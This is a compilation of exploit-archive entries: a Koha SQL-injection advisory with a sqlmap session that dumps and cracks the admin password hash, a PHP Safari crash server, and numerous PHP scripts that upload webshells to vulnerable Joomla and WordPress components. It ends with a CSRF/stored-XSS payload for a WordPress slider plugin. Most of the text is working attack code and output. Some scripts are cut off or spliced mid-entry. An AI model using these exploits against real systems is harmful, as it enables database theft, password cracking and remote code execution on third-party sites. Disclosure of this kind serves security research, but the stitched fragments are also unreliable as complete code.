http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
#### Description: ####
By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.
#### Proof-of-concept: ####
1. Inspect Koha database schema
Have a look at how to query the database for superlibrarian users:
http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians
So basically we we need to execute some SQL statement like this:
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
2. Query the database with sqlmap
So let's fire up sqlmap with the --sql-shell parameter and input the query:
root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150513}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:20:07
[09:20:07] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: number (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
---
[09:20:09] [INFO] testing MySQL
[09:20:09] [INFO] confirming MySQL
[09:20:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
[09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'
[09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
admin
[09:21:46] [INFO] retrieved: $2a$08$taQ
[09:23:33] [ERROR] invalid character detected. retrying..
[09:23:33] [WARNING] increasing time delay to 5 seconds
afOgEEhU
[09:25:10] [ERROR] invalid character detected. retrying..
[09:25:10] [WARNING] increasing time delay to 6 seconds
t/gW
[09:26:13] [ERROR] invalid character detected. retrying..
[09:26:13] [WARNING] increasing time delay to 7 seconds
TOmqnYe1Y6ZNxCENa
[09:29:57] [ERROR] invalid character detected. retrying..
[09:29:57] [WARNING] increasing time delay to 8 seconds
2.ONk2eZhnuEw5z9OjjxS
[09:35:08] [ERROR] invalid character detected. retrying..
[09:35:08] [WARNING] increasing time delay to 9 seconds
select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:
'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'
3. Feed john the ripper and be lucky
root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass
root@kali:/home/wicked# john ./admin-pass
Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
admin (?)
guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260 trying: Smokey - allstate
Use the "--show" option to display all of the cracked passwords reliably
root@kali:/home/wicked# john ./admin-pass --show
?:admin
1 password hash cracked, 0 left
4. Log in with username "admin" and password "admin" ;)
### CVE-2015-xxxx ###
#### Titel: ####
Unauthenticated SQL Injection
#### Type of vulnerability: ####
SQL Injection vulnerabilities in Koha staff client allows attackers to read arbitrary data from the database.
##### Exploitation vector:
The url parameter 'number' of the /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.
##### Attack outcome:
An attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem is possible.
#### Impact: ####
critical
#### Software/Product name: ####
Koha
#### Affected versions: ####
* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12
#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
#### Vendor: ####
http://koha-community.org/ (Open Source)
#### CVE number: ####
CVE-2015-xxxx
#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities
#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org
#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
#### Description: ####
By manipulating the variable 'number' of the /cgi-bin/koha/opac-tags_subject.pl script the database can be accessed via time-based blind injections. If the webserver is misconfigured, the file-system can be accessed as well.
#### Proof-of-concept: ####
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002
#!/usr/bin/php
<?php
# Title : Safari 8.0.X / OS X Yosemite 10.10.3 Crash Proof Of
Concept
# Product Website: https://www.apple.com/safari/
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
# Usage :
# php poc.php
# Open Safari and open ip:8080 / 127.0.0.1:8080
# Crashed ;)
#Main POC Code
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create
socket!');
socket_bind($reza, 0,8080);
socket_listen($reza);
print "\nNow Open Safari and open ip:8080 / 127.0.0.1:8080\n\n";
$msg =
'PGh0bWw+CjxzdHlsZT4Kc3ZnIHsKICAgIHBhZGRpbmctdG9wOiAxMzk0JTsKICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7Cn0KPC9zdHlsZT4KPHN2ZyB2aWV3Qm94PSIxIDIgNTAwIDUwMCIgd2lkdGg9IjkwMCIgaGVpZ2h0PSI5MDAiPgo8cG9seWxpbmUgcG9pbnRzPSIxIDEsMiAyIj48L3BvbHlsaW5lPgo8L3N2Zz4KPC9odG1sPg==';
$msgd=base64_decode($msg);
for (;;) {
if ($client = @socket_accept($reza)) {
socket_write($client, "HTTP/1.1 200 OK\r\n" .
"Content-length: " . strlen($msgd) . "\r\n" .
"Content-Type: text/html; charset=UTF-8\r\n\r\n" .
$msgd);
}
else usleep(100000);
}
#Crash Report
/*
Process Model:
Multiple Web Processes
Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 libsystem_kernel.dylib 0x00007fff8e628286 __pthread_kill +
10
1 libsystem_c.dylib 0x00007fff90619b53 abort + 129
2 libsystem_c.dylib 0x00007fff905e1c39 __assert_rtn + 321
3 com.apple.CoreGraphics 0x00007fff87716e4e
CGPathCreateMutableCopyByTransformingPath + 242
4 com.apple.CoreGraphics 0x00007fff8773aff0 CGContextAddPath +
93
5 com.apple.WebCore 0x0000000104ea8c84
WebCore::GraphicsContext::fillPath(WebCore::Path const&) + 148
6 com.apple.WebCore 0x000000010597e851
WebCore::RenderSVGResourceSolidColor::postApplyResource(WebCore::RenderElement&,
WebCore::GraphicsContext*&, unsigned short, WebCore::Path const*,
WebCore::RenderSVGShape const*) + 65
7 com.apple.WebCore 0x000000010597f08a
WebCore::RenderSVGShape::fillShape(WebCore::RenderStyle const&,
WebCore::GraphicsContext*) + 122
8 com.apple.WebCore 0x000000010597f3c3
WebCore::RenderSVGShape::fillStrokeMarkers(WebCore::PaintInfo&) + 131
9 com.apple.WebCore 0x0000000104fa73cb
WebCore::RenderSVGShape::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 379
10 com.apple.WebCore 0x0000000104fa7062
WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 1330
11 com.apple.WebCore 0x0000000104f1ee72
WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 722
12 com.apple.WebCore 0x0000000105429e88
WebCore::InlineElementBox::paint(WebCore::PaintInfo&,
WebCore::LayoutPoint const&, WebCore::LayoutUnit, WebCore::LayoutUnit) +
312
13 com.apple.WebCore 0x0000000104ea4a63
WebCore::InlineFlowBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 1251
14 com.apple.WebCore 0x0000000104ea4509
WebCore::RootInlineBox::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&, WebCore::LayoutUnit, WebCore::LayoutUnit) + 89
15 com.apple.WebCore 0x0000000104e53d96
WebCore::RenderLineBoxList::paint(WebCore::RenderBoxModelObject*,
WebCore::PaintInfo&, WebCore::LayoutPoint const&) const + 694
16 com.apple.WebCore 0x0000000104e51373
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 67
17 com.apple.WebCore 0x0000000104e50724
WebCore::RenderBlock::paintObject(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 420
18 com.apple.WebCore 0x0000000104e529af
WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 287
19 com.apple.WebCore 0x00000001058db139
WebCore::RenderBlock::paintChild(WebCore::RenderBox&,
WebCore::PaintInfo&, WebCore::LayoutPoint const&, WebCore::PaintInfo&,
bool) + 393
20 com.apple.WebCore 0x0000000104e51478
WebCore::RenderBlock::paintChildren(WebCore::PaintInfo&,
WebCore::LayoutPoint const&, WebCore::PaintInfo&, bool) + 72
21 com.apple.WebCore 0x0000000104e51420
WebCore::RenderBlock::paintContents(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 240
22 com.apple.WebCore 0x0000000104e50724
WebCore::RenderBlock::paintObject(WebCore::PaintInfo&,
WebCore::LayoutPoint const&) + 420
23 com.apple.WebCore 0x0000000104e529af
WebCore::RenderBlock::paint(WebCore::PaintInfo&, WebCore::LayoutPoint
const&) + 287
24 com.apple.WebCore 0x0000000104e512b2
WebCore::RenderLayer::paintForegroundForFragmentsWithPhase(WebCore::PaintPhase,
WTF::Vector<WebCore::LayerFragment, 1ul, WTF::CrashOnOverflow> const&,
WebCore::GraphicsContext*, WebCore::RenderLayer::LayerPaintingInfo
const&, unsigned int, WebCore::RenderObject*) + 370
25 com.apple.WebCore 0x0000000104e50f87
WebCore::RenderLayer::paintForegroundForFragments(WTF::Vector<WebCore::LayerFragment,
1ul, WTF::CrashOnOverflow> const&, WebCore::GraphicsContext*,
WebCore::GraphicsContext*, WebCore::LayoutRect const&, bool,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int,
WebCore::RenderObject*, bool, bool) + 423
26 com.apple.WebCore 0x0000000104e4fc30
WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2576
27 com.apple.WebCore 0x0000000104e4f002
WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
28 com.apple.WebCore 0x0000000104e4fd62
WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
29 com.apple.WebCore 0x0000000104e7ac36
WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer
const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned
int, unsigned int) + 358
30 com.apple.WebCore 0x000000010593757f
WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer
const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect
const&) + 799
31 com.apple.WebCore 0x000000010537dd44
WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&,
WebCore::FloatRect const&) + 132
32 com.apple.WebCore 0x00000001058b6ad9
WebCore::PlatformCALayer::drawLayerContents(CGContext*,
WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul,
WTF::CrashOnOverflow>&) + 361
33 com.apple.WebCore 0x0000000105b170a7
WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*,
WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
34 com.apple.WebCore 0x0000000105ba36cc -[WebSimpleLayer
drawInContext:] + 172
35 com.apple.QuartzCore 0x00007fff8d7033c7
CABackingStoreUpdate_ + 3306
36 com.apple.QuartzCore 0x00007fff8d7026d7
___ZN2CA5Layer8display_Ev_block_invoke + 59
37 com.apple.QuartzCore 0x00007fff8d702694
x_blame_allocations + 81
38 com.apple.QuartzCore 0x00007fff8d6f643c
CA::Layer::display_() + 1546
39 com.apple.WebCore 0x0000000105ba35eb -[WebSimpleLayer
display] + 43
40 com.apple.QuartzCore 0x00007fff8d6f47fd
CA::Layer::display_if_needed(CA::Transaction*) + 603
41 com.apple.QuartzCore 0x00007fff8d6f3e81
CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
42 com.apple.QuartzCore 0x00007fff8d6f3612
CA::Context::commit_transaction(CA::Transaction*) + 242
43 com.apple.QuartzCore 0x00007fff8d6f33ae
CA::Transaction::commit() + 390
44 com.apple.QuartzCore 0x00007fff8d701f19
CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long,
void*) + 71
45 com.apple.CoreFoundation 0x00007fff869f7127
__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
46 com.apple.CoreFoundation 0x00007fff869f7080
__CFRunLoopDoObservers + 368
47 com.apple.CoreFoundation 0x00007fff869e8bf8
CFRunLoopRunSpecific + 328
48 com.apple.HIToolbox 0x00007fff8df1156f
RunCurrentEventLoopInMode + 235
49 com.apple.HIToolbox 0x00007fff8df112ea
ReceiveNextEventCommon + 431
50 com.apple.HIToolbox 0x00007fff8df1112b
_BlockUntilNextEventMatchingListInModeWithFilter + 71
51 com.apple.AppKit 0x00007fff8ebe59bb _DPSNextEvent +
978
52 com.apple.AppKit 0x00007fff8ebe4f68 -[NSApplication
nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
53 com.apple.AppKit 0x00007fff8ebdabf3 -[NSApplication
run] + 594
54 com.apple.AppKit 0x00007fff8eb57354 NSApplicationMain
+ 1832
55 libxpc.dylib 0x00007fff8ab77958 _xpc_objc_main +
793
56 libxpc.dylib 0x00007fff8ab79060 xpc_main + 490
57 com.apple.WebKit.WebContent 0x0000000103f10b40 0x103f10000 + 2880
58 libdyld.dylib 0x00007fff873e45c9 start + 1
*/
?>
source: https://www.securityfocus.com/bid/53977/info
The Easy Flash Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.
Easy Flash Uploader 2.0 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.example.com/plugins/content/efup_files/helper.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'JPATH_BASE'=>'../../../',
'filesize'=>'2000',
'filetypes'=>'*.*',
'mimetypes'=>"*",
'destination'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
source: https://www.securityfocus.com/bid/53975/info
The jFancy component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
jFancy 2.03 is vulnerable; other versions may also be affected.
Exploit :
PostShell.php
<?php
$uploadfile="lo.php.gif";
$ch = curl_init("http://www.example.com/modules/mod_jfancy/script.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('photoupload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.example.com/images/lo.php.gif
lo.php.gif
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53973/info
The IDoEditor component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.
IDoEditor 1.6.16 is vulnerable; other versions may also be affected.
<html>
<body>
<center>
<form
action="http://www.example.com/plugins/editors/idoeditor/themes/advanced/php/image.php"
method="post" enctype="multipart/form-data">
<input type="file" name="pfile">
<input type="submit" name="Submit" value="Upload">
</form>
</center>
</body>
</html>
source: https://www.securityfocus.com/bid/53972/info
The DentroVideo component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
DentroVideo 1.2 is vulnerable; other versions may also be affected.
Exploit 1 :
PostShell.php
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.example.com/components/com_dv/externals/phpupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file1'=>"@$uploadfile",
'action'=>'upload'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.example.com/lo.php
lo.php
<?php
phpinfo();
?>
Exploit 2 :
PostShell2.php
<?php
$uploadfile="lo.php.mpg3";
$ch =
curl_init("http://www.example.com/components/com_dv/externals/swfupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.example.com/dvvideos/uploads/originals/lo.php.mpg3
lo.php.mpg3
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53969/info
The Art Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Art Uploader 1.0.1 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.example.com/modules/mod_artuploader/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('userfile'=>"@$uploadfile",
'path'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.example.com/modules/mod_artuploader/lo.php
lo.php
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53968/info
The Simple SWFUpload component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Simple SWFUpload 2.0 is vulnerable;other versions may also be affected.
<?php
$uploadfile="lo.php.gif";
$ch =
curl_init("http://www.exemple.com/administrator/components/com_simpleswfupload/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/images/stories/lo.php.gif
lo.php.gif
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53967/info
HD FLV Player plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
HD FLV Player 1.7 is vulnerable; other versions may also be affected.
Exploit :
PostShell.php
<?php
$uploadfile="lo.php.jpg";
$ch =
curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-hd-flv-player/uploadVideo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('myfile'=>"@$uploadfile",
'mode'=>'image'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.example.com/wordpress/wp-content/uploads/18_lo.php.jpg
Filename : [CTRL-u] PostShell.php after executed
lo.php.jpg
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53945/info
FileManager is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
nj3ct0rK3d-Sh3lL#";
$uploadfile = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
if ($uploadfile != "exit")
{
$ch = curl_init("http://www.example.com/modules/fileManager/xupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'path'=>'img'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
}
else break;
?>
source: https://www.securityfocus.com/bid/53944/info
The Joomsport component for Joomla! is prone to an SQL-injection vulnerability and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n|===============================================|";
print "\n| Joomla (com_joomsport) Arbitrary Shell Upload |";
print "\n| Provided By KedAns-Dz <ked-h[at]hotmail[.]com>|";
print "\n|===============================================|\n";
if ($argc < 2)
{
print "\nUsage : php $argv[0] [host] [path]";
print "\nExample : php $argv[0] www.p0c.tld /wp/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "Content-Disposition: form-data; name=\"Filename\"; filename=\"k3d.php.png\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$packet = "POST {$path}components/com_joomsport/includes/imgres.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: image/png\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\n Inj3ct0rK3d-Sh3lL#";
$cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php.png
if ($cmd != "exit")
{
$packet = "GET {$path}k3d.php.png{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
}
else break;
}
?>
Access Shell : http://www.example.com/components/com_joomsport/images/k3d.php.png
#### Exploit (2) Blind SQL Injection =>
<?php
$bs =
curl_init("http://www.example.com/components/com_joomsport/includes/func.php");
curl_setopt($bs, CURLOPT_POST, true);
curl_setopt($bs, CURLOPT_POSTFIELDS,
array('query'=>"SELECT * FROM jos_users"));
curl_setopt($bs, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($bs);
curl_close($bs);
print "$postResult";
?>
# Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion
# Date: 2015-06-23
# Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/"
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/slider-image.latest-stable.zip
# Version: 2.7.5
# Tested on: windows 7 ultimate + Firefox.
# video demo: https://www.youtube.com/watch?v=RTLAbmyBIU8
====================================================
* CSRF + Persistent JS/HTML Injection
====================================================
=====================
DECRIPTION
=====================
An attacker can make a user with access privileges to a page containing malicious script
and send some parameters injected JavaScript to the database.
============================
vulnerable POST parameters
============================
//variables with variation names//
order_by_[variation_number]
titleimage[variation_number]
sl_url[variation_number]
sl_link_target[variation_number]
im_description[variation_number]
imagess[variation_number]
//variables with constant names//
sl_pausetime
sl_changespeed
===============
EXPLOTATION
===============
variable numbers can be extracted from a published page containing the slider. and make all
parameters injected with code JS / HTML.
-------------------
EXAMPLE
-------------------
[Extracting data for use]
In a vulnerable site and has posted a slider, the malicious user can extract information
the attack is successful.
-----------------------------------------------------------------------------------------
[variation_number] is a variable number that could be extracted as follows.
-----------------------------------------------------------------------------------------
The attacker sees the following framento source code of the page with slider:
<!-- ##########################DOTS######################### -->
<div class="huge_it_slideshow_dots_container_2"> [ <---SLIDER_ID_FOUND=2 ]
<div class="huge_it_slideshow_dots_thumbnails_2">
<div id="huge_it_dots_0_1" class="huge_it_slideshow_dots_1 huge_it_slideshow_dots_active_1"
onclick="huge_it_change_image_1(parseInt(jQuery('#huge_it_current_image_key_1').val()), '0', data_1,false,true);
return false;"
image_id="14" [ <---ITS_VARIATION_NUMBER!!! ]
image_key="0"></div>
</div>
<a id="huge_it_slideshow_left_1" href="#" >
<div id="huge_it_slideshow_left-ico_1">
<div><i class="huge_it_slideshow_prev_btn_1 fa"></i></div></div>
</a>
<a id="huge_it_slideshow_right_1" href="#" >
<div id="huge_it_slideshow_right-ico_1 , data_1">
<div><i class="huge_it_slideshow_next_btn_1 fa"></i></div></div>
</a>
</div>
<!-- ##########################IMAGES######################### -->
-----------------------------------------------------------------------------------
Classes tags [<div>] have a number at the end that is the id of the slider.
Also labeled [<div id = "huge_it_dots_ ...>] has the property [image_id] which is the
POST variable number of vulnerable parameters.
============================================
POC [DATA RELATING TO THE ABOVE]
============================================
------------ SLIDER_ID
URL REQUEST |
------------
http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&id=2&task=apply
--------
POSTDATA
--------
name=i0akiN-SEC&order_by_14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&imagess14=&
titleimage14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_url14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_link_target14=&
sl_pausetime=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
sl_changespeed=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
im_description14=as%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fi0akiN_HACK%2F%29%3B%3C%2Fscript%3E&
imagess14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_width=500&
sl_height=300&pause_on_hover=off&slider_effects_list=cubeH&sl_position=center&task=
--------------------
RESPONSE ADMIN PAGE
--------------------
...
<input class="order_by" type="hidden" name="order_by_14" value="0" />
<div class="image-container">
<img src="" onmouseover=alert(/i0akiN_hack/) a="" />
<div>
<script>
... </script>
<input type="hidden" name="imagess14" id="_unique_name14" value="" onmouseover=alert(/i0akiN_hack/) a="" />
<span class="wp-media-buttons-icon"></span>
<div class="huge-it-editnewuploader uploader button14 add-new-image">
<input type="button" class="button14 wp-media-buttons-icon editimageicon" name="_unique_name_button14" id="_unique_name_button14" value="Edit image" />
</div>
</div>
</div>
<div class="image-options">
<div>
<label for="titleimage14">Title:</label>
<input class="text_area" type="text" id="titleimage14" name="titleimage14" id="titleimage14" value="" onmouseover=alert(/i0akiN_hack/) a="">
</div>
<div class="description-block">
<label for="im_description14">Description:</label>
